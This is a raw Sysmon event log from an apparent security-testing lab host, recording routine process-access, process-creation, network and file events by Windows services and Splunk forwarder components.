10:39:47.443{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214727Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.443{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214726Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.443{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214725Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.443{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214724Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.443{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0EF3-6216-0C04-000000003902}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214723Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.443{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0EF3-6216-0C04-000000003902}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214722Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.444{4F8D34B0-0EF3-6216-0C04-000000003902}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000214721Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.167{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51210-false10.0.1.12-8089- 23542300x8000000000000000214751Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:48.912{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B82E07FFE703DD0CEF6E47AE00CD96A,SHA256=8FD0F30BE8F445DB7A19B71152FE674CCDD4D00F62D8CCFB30ACF9F6E57CD927,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285614Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:48.809{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CE86B6FBF4A04175BF1B8311A7C4843,SHA256=FE54BE8DB761AD20EA4D66C971B3FC5EF73CC1194EE2851D1979AB5FB8D51B65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214750Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:48.678{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A27FD491B3467D94A9F6D898F12AA93C,SHA256=76233BCB193FD23BEAFD42E0E450732CA04551505E306E25657CF53EE9FEE6AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214749Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:48.100{4F8D34B0-0EF3-6216-0D04-000000003902}32161868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285615Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:49.825{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D18B07A3CD1B13C136FBD70192140D57,SHA256=47F97C7604D0855AD1D3C140E7AB22DA0795B5B545EA1F60F510835696663AD8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214778Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.818{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0EF5-6216-0F04-000000003902}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214777Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.818{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214776Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.818{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214775Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.818{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214774Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.818{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214773Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.818{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214772Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.818{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214771Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.818{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214770Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.818{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214769Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.818{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214768Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.818{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0EF5-6216-0F04-000000003902}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214767Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.818{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0EF5-6216-0F04-000000003902}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214766Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.819{4F8D34B0-0EF5-6216-0F04-000000003902}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000214765Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.537{4F8D34B0-0EF5-6216-0E04-000000003902}18604004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214764Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.318{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0EF5-6216-0E04-000000003902}1860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214763Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.318{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214762Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 